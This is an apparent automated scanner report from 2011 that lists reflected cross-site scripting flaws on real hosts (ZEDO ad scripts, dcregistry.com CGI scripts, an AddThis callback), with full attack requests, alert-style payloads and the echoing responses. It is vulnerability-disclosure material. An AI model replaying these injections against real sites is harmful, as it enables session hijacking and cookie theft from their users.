HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "812b9fe7-809a-4989a59833840" Vary: Accept-Encoding X-Varnish: 2233582316 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=526 Expires: Wed, 19 Jan 2011 18:09:46 GMT Date: Wed, 19 Jan 2011 18:01:00 GMT Connection: close Content-Length: 1987
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat='fd682';alert(1)//8194c718852';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=fd682';alert(1)//8194c718852;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae34c"%3balert(1)//b23cf797565 was submitted in the q parameter. This input was echoed as ae34c";alert(1)//b23cf797565 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=ae34c"%3balert(1)//b23cf797565&$=&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1
Response (redirected)
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFChanCap=1479B1099,2#702971|0,1,1;expires=Fri, 18 Feb 2011 18:00:59 GMT;path=/;domain=.zedo.com; Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "812b9fe7-809a-4989a59833840" Vary: Accept-Encoding X-Varnish: 2233582316 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=527 Expires: Wed, 19 Jan 2011 18:09:46 GMT Date: Wed, 19 Jan 2011 18:00:59 GMT Connection: close Content-Length: 2035
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat='ae34c";alert(1)//b23cf797565';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=ae34c";alert(1)//b23cf797565;z="+Math.random();}
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35817"%3balert(1)//c76b7e8cf54 was submitted in the $ parameter. This input was echoed as 35817";alert(1)//c76b7e8cf54 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=35817"%3balert(1)//c76b7e8cf54&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1099:35817";alert(1)//c76b7e8cf54;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 18:00:52 GMT;path=/;domain=.zedo.com; ETag: "812b9fe7-809a-4989a59833840" Vary: Accept-Encoding X-Varnish: 2233582316 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=534 Expires: Wed, 19 Jan 2011 18:09:46 GMT Date: Wed, 19 Jan 2011 18:00:52 GMT Connection: close Content-Length: 2038
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat=',35817";alert(1)//c76b7e8cf54';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,35817";alert(1)//c76b7e8cf54;z="+Math.random();}
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7468b'%3balert(1)//803ecb61dff was submitted in the $ parameter. This input was echoed as 7468b';alert(1)//803ecb61dff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=7468b'%3balert(1)//803ecb61dff&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1099:7468b';alert(1)//803ecb61dff;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 18:00:53 GMT;path=/;domain=.zedo.com; ETag: "812b9fe7-809a-4989a59833840" Vary: Accept-Encoding X-Varnish: 2233582316 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=533 Expires: Wed, 19 Jan 2011 18:09:46 GMT Date: Wed, 19 Jan 2011 18:00:53 GMT Connection: close Content-Length: 2038
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat=',7468b';alert(1)//803ecb61dff';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,7468b';alert(1)//803ecb61dff;z="+Math.random();}
4.19. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://d7.zedo.com
Path: /bar/v16-401/d3/jsc/fmr.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb90e'-alert(1)-'40d04a4f8f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/d3/jsc/fmr.js?fb90e'-alert(1)-'40d04a4f8f9=1 HTTP/1.1 Host: d7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; aps=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFcat=933,56,15:1099,2,14; ZFFAbh=749B826,20|1483_749#365; FFad=0:0; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 942 Content-Type: application/x-javascript Set-Cookie: FFad=0:0:0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=0,0,0:933,56,15:1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "812b9fe7-809a-4989a59833840" X-Varnish: 2233582316 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=249 Expires: Wed, 19 Jan 2011 18:11:59 GMT Date: Wed, 19 Jan 2011 18:07:50 GMT Connection: close
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=0;var zzPat='';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69e4b"%3balert(1)//9f07af1dcbc was submitted in the q parameter. This input was echoed as 69e4b";alert(1)//9f07af1dcbc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=69e4b"%3balert(1)//9f07af1dcbc&$=&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 18:00:49 GMT;path=/;domain=.zedo.com; Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "812b9fe7-809a-4989a59833840" Vary: Accept-Encoding X-Varnish: 2233582316 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=48 Expires: Wed, 19 Jan 2011 18:01:37 GMT Date: Wed, 19 Jan 2011 18:00:49 GMT Connection: close Content-Length: 2035
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat='69e4b";alert(1)//9f07af1dcbc';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=69e4b";alert(1)//9f07af1dcbc;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59624'%3balert(1)//65aac50a934 was submitted in the q parameter. This input was echoed as 59624';alert(1)//65aac50a934 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=59624'%3balert(1)//65aac50a934&$=&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 18:00:50 GMT;path=/;domain=.zedo.com; Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "812b9fe7-809a-4989a59833840" Vary: Accept-Encoding X-Varnish: 2233582316 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=47 Expires: Wed, 19 Jan 2011 18:01:37 GMT Date: Wed, 19 Jan 2011 18:00:50 GMT Connection: close Content-Length: 2035
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat='59624';alert(1)//65aac50a934';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=59624';alert(1)//65aac50a934;z="+Math.random();}
The value of the db request parameter is copied into the HTML document as plain text between tags. The payload bc39f<script>alert(1)</script>6e8f0f5d54e was submitted in the db parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cgi-bin/classifieds/classifieds.cgi?db=personalsbc39f<script>alert(1)</script>6e8f0f5d54e HTTP/1.1 Host: dcregistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:21:43 GMT Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6 Connection: close Content-Type: text/html Content-Length: 532
We're sorry, but the script was unable to require /usr/home/dcreg/public_html/www.dcregistry.com/cgi-bin/classifieds/db/personalsbc39f<script>alert(1)</script>6e8f0f5d54e.db at line 215 in classifieds.cgi. Please make sure that these files exist, that you have the path set correctly, and that the permissions are set properly. This message could also indicate that a s ...[SNIP]...
The value of the db request parameter is copied into the HTML document as plain text between tags. The payload fe27a<script>alert(1)</script>35aefdde02f was submitted in the db parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cgi-bin/surveys/survey.cgi?db=aad_lookfe27a<script>alert(1)</script>35aefdde02f&website=&language=&display_poll_results=on HTTP/1.1 Host: dcregistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:21:36 GMT Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6 Connection: close Content-Type: text/html Content-Length: 517
We're sorry, but the script was unable to require /usr/home/dcreg/public_html/www.dcregistry.com/cgi-bin/surveys/db/aad_lookfe27a<script>alert(1)</script>35aefdde02f.db at line 206 in survey.cgi. Please make sure that these files exist, that you have the path set correctly, and that the permissions are set properly. This message could also indicate that a syntax ...[SNIP]...
The value of the language request parameter is copied into the HTML document as plain text between tags. The payload 5027a<script>alert(1)</script>12f2a4bf5c6 was submitted in the language parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cgi-bin/surveys/survey.cgi?db=aad_look&website=&language=5027a<script>alert(1)</script>12f2a4bf5c6&display_poll_results=on HTTP/1.1 Host: dcregistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:21:41 GMT Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6 Connection: close Content-Type: text/html Content-Length: 531
We're sorry, but the script was unable to require /usr/home/dcreg/public_html/www.dcregistry.com/cgi-bin/surveys/language/5027a<script>alert(1)</script>12f2a4bf5c6/template.pl at line 174 in survey.cgi. Please make sure that these files exist, that you have the path set correctly, and that the permissions are set properly. This message could also indicate that ...[SNIP]...
The value of the website request parameter is copied into the HTML document as plain text between tags. The payload 39b59<script>alert(1)</script>d0e2bc9f57e was submitted in the website parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cgi-bin/surveys/survey.cgi?db=aad_look&website=39b59<script>alert(1)</script>d0e2bc9f57e&language=&display_poll_results=on HTTP/1.1 Host: dcregistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:21:40 GMT Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6 Connection: close Content-Type: text/html Content-Length: 515
We're sorry, but the script was unable to require /usr/home/dcreg/public_html/www.dcregistry.com/cgi-bin/surveys/websites/39b59<script>alert(1)</script>d0e2bc9f57e.cfg at line 441 in survey.cgi. Please make sure that these files exist, that you have the path set correctly, and that the permissions are set properly. This message could also indicate that a synta ...[SNIP]...
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 17c72<script>alert(1)</script>aed7ed93f68 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /red/psi/sites/www.csmonitor.com/p.json?callback=_ate.ad.hpr17c72<script>alert(1)</script>aed7ed93f68&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.csmonitor.com%2FUSA1edc1%2522-alert(document.cookie)-%25228a5e635d48%2FJustice%2F2011%2F0118%2FSupreme-Court-declines-appeal-of-D.C.-gay-marriage-law&ref=http%3A%2F%2Fburp%2Fshow%2F25&jdg4df HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh30.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; di=%7B%7D..1295378586.60|1293848200.66; dt=X; psc=4; uid=4d1ec56b7612a62c
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 220 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Wed, 19 Jan 2011 18:00:44 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Fri, 18 Feb 2011 18:00:44 GMT; Path=/ Set-Cookie: di=%7B%7D..1295460044.19F|1295378586.60|1293848200.66; Domain=.addthis.com; Expires=Fri, 18-Jan-2013 10:54:33 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Wed, 19 Jan 2011 18:00:44 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 19 Jan 2011 18:00:44 GMT Connection: close
